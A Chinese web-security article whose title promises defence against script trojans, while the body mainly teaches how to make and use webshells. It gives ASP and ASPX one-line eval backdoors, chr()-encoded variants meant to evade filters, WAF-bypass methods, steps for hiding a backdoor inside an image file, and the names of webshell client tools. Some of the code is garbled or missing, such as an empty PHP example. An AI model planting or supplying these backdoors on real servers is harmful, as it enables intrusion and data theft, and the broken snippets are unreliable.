千家信息网

web安全中脚本木马如何防御

发表于:2025-01-20 作者:千家信息网编辑
千家信息网最后更新 2025年01月20日,这篇文章给大家分享的是有关web安全中脚本木马如何防御的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。脚本木马的制作原理webshell就是一种网页后门(web后门)webs
千家信息网最后更新 2025年01月20日web安全中脚本木马如何防御

这篇文章给大家分享的是有关web安全中脚本木马如何防御的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。

脚本木马的制作原理

webshell就是一种网页后门(web后门)

webshell制作原理webshell使用技巧webshell"黑吃黑"

一. webshell制作原理

一句话木马(2010年出来)--> 上传大马进行提权小马                --> 上传大马进行提权大马打包马脱裤马执行命令马

GetShell就是拿webshell的动作

1. 一句话木马

一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用

asp : <% execute request("value") %><%eval request ("pass")%>--------------------------------------sms2056.com/x.asp?value="cmd"
aspx : <%@ Page Language="Jscript"%><%eval(Request.I tem["pass"]," uns afe");%>
PHP : 

2. 工作原理

黑客在注册信息的电子邮箱或个人主页等中插入类似如下代码:

<%eval request ("pass")%>

其中pass是值,所以你可以更改自己的值,前面的request就是获取这个值

上述代码现在比较多见,而且字符数少,对表单字数有限制的地方特别的实用

当知道了数据库的URL,就可以利用本地一张网页进行连接得到WebShell(不知道数据库也可以,只要知道一句话木马的文件被插入到那一个ASP文件里面就可以了)

一句话木马是基于B/S结构的

3. 一句话木马变形

---------------------------------------x.php?a=eval&b="cmd"
<%Eval (Request(chr(112)))%>---------------------------------------aspcms2.0以上会检查脚本中的双引号""",单引号"'"
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("pass"))%>
<% a=%request("gold") %><%eval %a%>

4. 一般WAF绕过方式

函数绕过编码绕过可变变量绕过动态获取参数绕过

5. 一句话图片马的制作

C32下做一句话打开c32, 把图片放里面,写入一句话保存,退出
cmd下做一句话copy /b 1.jpg+1.asp 2.jpg
win7下右键图片,在属性 -> 详细信息 -> 版权内插入一句话即可

6. 常见的一句话客户端

中国菜刀中国砍刀蚁剑C刀lanker一句话客户端ZV新型PHP一句话木马客户端GUI版一句话客户端增强版

7. 大马

大马体积比较大,一般50kb以上.功能也多,一般都包含提权命令,磁盘管理,数据库连接接口,执行命令甚至有些以具备自带提权功能和压缩,解压缩网站程序的功能.这种马隐蔽性不好,而大多代码如不加密的话很多杀毒厂商开始追杀此类程序 .

用途 : 提权打包脱裤增删文件

8. 小马

作用主要用户上传大马

二. webshell使用技巧

内容编码配合解析漏洞配合文件包含利用文件名溢出

三. webshell"黑吃黑"

http://xss.fbisb.com/xss.php?do=login

1. 找shell后门

查找后门查找webshell后门找到后门地址反搞wehshell箱子

2. 找一句话客户端后门

查找客户端后门找到后门地址反搞wehshell箱子

感谢各位的阅读!关于"web安全中脚本木马如何防御"这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,让大家可以学到更多知识,如果觉得文章不错,可以把它分享出去让更多的人看到吧!

0